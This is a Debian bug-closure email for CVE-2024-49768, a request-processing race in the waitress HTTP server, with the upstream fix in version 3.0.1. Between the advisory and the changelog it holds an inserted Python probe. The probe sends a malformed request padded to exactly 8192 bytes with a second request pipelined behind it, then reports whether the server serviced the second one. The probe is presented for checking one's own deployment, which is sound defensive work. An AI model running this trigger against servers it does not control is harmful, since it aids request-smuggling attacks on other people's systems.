Your message dated Thu, 31 Oct 2024 08:23:19 +0000
with message-id <e1t6qsd-00dpfi...@fasolo.debian.org>
and subject line Bug#1086467: fixed in waitress 3.0.1-1
has caused the Debian Bug report #1086467,
regarding waitress: CVE-2024-49768: Request processing race condition in HTTP pipelining with invalid first request
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
1086467: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1086467
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: waitress
Version: 3.0.0-1
Severity: grave
Tags: security upstream
X-Debbugs-Cc: car...@debian.org, Debian Security Team <t...@security.debian.org>
Control: found -1 2.1.2-2

Hi,

The following vulnerability was published for waitress.

CVE-2024-49768[0]:
| Waitress is a Web Server Gateway Interface server for Python 2 and
| 3. A remote client may send a request that is exactly recv_bytes
| (defaults to 8192) long, followed by a secondary request using HTTP
| pipelining. When request lookahead is disabled (default) we won't
| read any more requests, and when the first request fails due to a
| parsing error, we simply close the connection. However when request
| lookahead is enabled, it is possible to process and receive the
| first request, start sending the error message back to the client
| while we read the next request and queue it. This will allow the
| secondary request to be serviced by the worker thread while the
| connection should be closed. Waitress 3.0.1 fixes the race
| condition. As a workaround, disable channel_request_lookahead, this
| is set to 0 by default disabling this feature.


If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2024-49768
    https://www.cve.org/CVERecord?id=CVE-2024-49768
[1] https://github.com/Pylons/waitress/security/advisories/GHSA-9298-4cf8-g4wj

Regards,
Salvatore

--- End Message ---
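The advisory quoted above describes the trigger shape precisely: a first request that is exactly `recv_bytes` (8192 by default) long and fails to parse, with a second, valid request pipelined behind it on the same connection; on a server running with `channel_request_lookahead` enabled, the second request can still be serviced after the first one's error response, instead of the connection being closed. The following is an added example, not code from the advisory, from Debian or from the waitress project: it builds that pipelined pair and classifies the raw response so you can check your own waitress deployment before and after upgrading to 3.0.1. The malformed element used to force the parse error (a header field name containing a space, `X Bad: 1`) is an assumption about what waitress rejects; the host, port and paths are hypothetical.

```python
import re
import socket
import sys

# Added example for CVE-2024-49768 (HTTP pipelining with an invalid first
# request). Not waitress code. ASSUMPTION: a header field name containing a
# space is rejected by waitress's parser; swap in another malformed element
# if your version accepts it.

# Matches the start of an HTTP response status line; two or more of these in
# the raw reply mean the pipelined second request was serviced.
STATUS_LINE = re.compile(rb"^HTTP/1\.[01] \d{3}", re.MULTILINE)


def build_payload(recv_bytes=8192, host=b"localhost", second_path=b"/",
                  bad_header=b"X Bad: 1"):
    """Return (first, second).

    first  -- a request that fails to parse, padded so its total length is
              exactly recv_bytes (the condition named in the advisory)
    second -- a valid request pipelined directly behind it
    """
    head = (b"GET / HTTP/1.1\r\n"
            + b"Host: " + host + b"\r\n"
            + bad_header + b"\r\n"      # assumed to trigger the parse error
            + b"X-Pad: ")
    tail = b"\r\n\r\n"
    pad = recv_bytes - len(head) - len(tail)
    if pad < 0:
        raise ValueError("recv_bytes is smaller than the fixed part of the request")
    first = head + b"a" * pad + tail    # pad header value to hit recv_bytes exactly
    second = b"GET " + second_path + b" HTTP/1.1\r\nHost: " + host + b"\r\n\r\n"
    return first, second


def count_status_lines(raw):
    """Number of HTTP status lines in a raw reply buffer."""
    return len(STATUS_LINE.findall(raw))


def classify(raw):
    """Interpret what the server did with the pipelined pair.

    One status line  -> error reply, then the connection was closed (expected)
    Two or more      -> the second request was serviced after the error
                        (the behaviour CVE-2024-49768 describes)
    """
    n = count_status_lines(raw)
    if n == 0:
        return "no response"
    if n == 1:
        return "closed after error"
    return "pipelined request serviced"


def probe(host="127.0.0.1", port=8080, recv_bytes=8192, timeout=3.0):
    """Send the pair to a server you control and classify the raw reply."""
    first, second = build_payload(recv_bytes, host.encode())
    raw = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(first + second)
        try:
            while True:
                chunk = s.recv(65536)
                if not chunk:           # server closed the connection
                    break
                raw += chunk
        except socket.timeout:
            pass                        # server kept the connection open
    return classify(raw), raw


if __name__ == "__main__":
    # Usage: python probe.py HOST PORT  (hypothetical target, your own server)
    target_host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    verdict, reply = probe(target_host, target_port)
    print(verdict)
    print(reply.decode("latin-1"))
```

Two caveats when reading the result. The advisory ties the bug to `channel_request_lookahead` being set above its default of 0, so a server running with the default will close after the error whether or not it is patched; the probe only discriminates on a server configured with lookahead enabled. And the status-line count is a heuristic: a response body that happens to contain text matching `HTTP/1.1 200` would inflate it, so confirm a "pipelined request serviced" verdict by reading the raw reply.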
--- Begin Message ---
Source: waitress
Source-Version: 3.0.1-1
Done: Colin Watson <cjwat...@debian.org>

We believe that the bug you reported is fixed in the latest version of
waitress, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 1086...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Colin Watson <cjwat...@debian.org> (supplier of updated waitress package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Wed, 30 Oct 2024 23:22:09 +0000
Source: waitress
Architecture: source
Version: 3.0.1-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Python Team <team+pyt...@tracker.debian.org>
Changed-By: Colin Watson <cjwat...@debian.org>
Closes: 1086467 1086468
Changes:
 waitress (3.0.1-1) unstable; urgency=medium
 .
   * Team upload.
   * New upstream release:
     - CVE-2024-49768: Fix a race condition in Waitress when
       `channel_request_lookahead` is enabled that could lead to HTTP request
       smuggling (closes: #1086467).
     - CVE-2024-49769: Fix a bug that would lead to Waitress busy looping on
       select() on a half-open socket due to a race condition that existed
       when creating a new HTTPChannel (closes: #1086468).
Checksums-Sha1:
 9869bbe1ad67e6a2769cd8dc12b47ea54014ca9f 2410 waitress_3.0.1-1.dsc
 56f5c350cb329058f2ed996f46a6a809d0a8994f 174572 waitress_3.0.1.orig.tar.gz
 275cc984f9952d39ae85bfc1638c29e07b83cba6 8164 waitress_3.0.1-1.debian.tar.xz
Checksums-Sha256:
 3e5a0500fc3548ba2ab39950c80b8142b53177da5a80a3675feaf6c9a63eaa77 2410 waitress_3.0.1-1.dsc
 1580a323734fbf3a95a2ed98e0cb3d3938fa7ef97f1a31897a26bd246ed5a70d 174572 waitress_3.0.1.orig.tar.gz
 f6f41b0767fda30ad86b48c109ed46bc3f5180d5fd4bf9fcacb859f290933307 8164 waitress_3.0.1-1.debian.tar.xz
Files:
 475cd69ad8088c8b566da718819f28e6 2410 python optional waitress_3.0.1-1.dsc
 b70b7601406e1bdb5514108421b9e930 174572 python optional waitress_3.0.1.orig.tar.gz
 8d7eb1a8a197a63d4c4e9b704aec24e6 8164 python optional waitress_3.0.1-1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----



--- End Message ---